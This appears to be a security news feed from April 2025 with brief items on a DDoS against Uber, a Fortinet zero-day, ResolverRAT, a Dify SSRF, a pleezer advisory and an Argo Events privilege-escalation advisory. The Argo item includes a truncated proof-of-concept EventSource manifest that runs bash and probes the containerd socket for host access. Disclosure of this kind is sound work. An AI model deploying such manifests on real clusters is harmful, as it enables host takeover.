Description: DieNet Targeted the Website of Uber
April 14th, 2025 (8 days ago)
Description: Dozens of people in Tibet have been arrested by Chinese authorities in recent years for "simply using a cellphone," according to the nonprofit Human Rights Watch.
April 14th, 2025 (8 days ago)
Description: Summary:
A user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges.
Details:
The EventSource and Sensor CRs allow the corresponding orchestrated pod to be customized through spec.template and spec.template.container (of type k8s.io/api/core/v1.Container). As a result, any field under container, such as command, args, securityContext or volumeMount, can be specified and is applied to the EventSource or Sensor pod by the code logic below.
```go
if args.EventSource.Spec.Template != nil && args.EventSource.Spec.Template.Container != nil {
	if err := mergo.Merge(&eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil {
		return nil, err
	}
}
```
With this, a user who specifies an EventSource or Sensor CR with particular properties under template is able to gain privileged access to the cluster host.
Here is an example that demonstrates the vulnerability.
```yaml
apiVersion: argoproj.io/v1alpha1
kind: EventSource
metadata:
  name: poc-vulnerable-eventsource
spec:
  webhook:
    security-test:
      port: "12000"
      endpoint: "/webhook"
  template:
    container:
      image: ubuntu:latest
      command: ["/bin/bash"]
      args: [
        "-c",
        "apt-get update && apt-get install -y curl && while true; do
          rm -f /tmp/data;
          echo '=== containerd socket...
```
April 14th, 2025 (8 days ago)
Description: Impact
Hook scripts in pleezer can be triggered by various events like track changes and playback state changes. In affected versions, these scripts were spawned without proper process cleanup, leaving zombie processes in the system's process table.
Even during normal usage, every track change and playback event would leave behind zombie processes. This leads to inevitable resource exhaustion over time as the system's process table fills up, eventually preventing new processes from being created. The issue is exacerbated if events occur rapidly, whether through normal use (e.g., skipping through a playlist) or potential manipulation of the Deezer Connect protocol traffic.
This vulnerability affects all users who have configured hook scripts using the --hook option.
Patches
This issue has been fixed in version 0.16.0. Users should upgrade to this version, which properly manages child processes using asynchronous process handling and cleanup.
Workarounds
Users who cannot upgrade immediately can:
- Disable hook scripts by removing the --hook option
- Ensure hook scripts handle their own child process cleanup
- Regularly restart pleezer to clear accumulated zombie processes
References
- Initial report: https://github.com/roderickvd/pleezer/discussions/83#discussioncomment-12818199
- Fix commit: 436a5f1e4c08989b58dbba2b0ffa423458016c2d
- Fixed release: https://github.com/roderickvd/pleezer/releases/tag/v0.16.0
- Advisory: https://github.com/roderickvd/pleezer/security/advisories/GHSA-4...
April 14th, 2025 (8 days ago)
Description: The CA/Browser Forum has voted to significantly reduce the lifespan of SSL/TLS certificates over the next 4 years, with a final lifespan of just 47 days starting in 2029. [...]
April 14th, 2025 (8 days ago)
CVE-2025-29720
Description: Dify v1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi.
EPSS Score: 0.01%
April 14th, 2025 (8 days ago)
🚨 Marked as known exploited on April 14th, 2025 (8 days ago).
Description: A threat actor posted about the zero-day exploit on the same day that Fortinet published a warning about known vulnerabilities under active exploitation.
April 14th, 2025 (8 days ago)
Description: Sir Thomas Drew — previously a top official in the Foreign Office and a key figure in Britain's response to Russia's invasion of Ukraine — will be the U.K.'s ambassador to France as the two countries prepare to work more closely on security issues.
April 14th, 2025 (8 days ago)
Description: Blind spots in network visibility, including in firewalls, IoT devices, and the cloud, are being exploited by Chinese state-backed threat actors with increasing success, according to new threat intelligence. Here's how experts say you can get eyes on it all.
April 14th, 2025 (8 days ago)
Description: A new remote access trojan (RAT) called 'ResolverRAT' is being used against organizations globally, with the malware used in recent attacks targeting the healthcare and pharmaceutical sectors. [...]
April 14th, 2025 (8 days ago)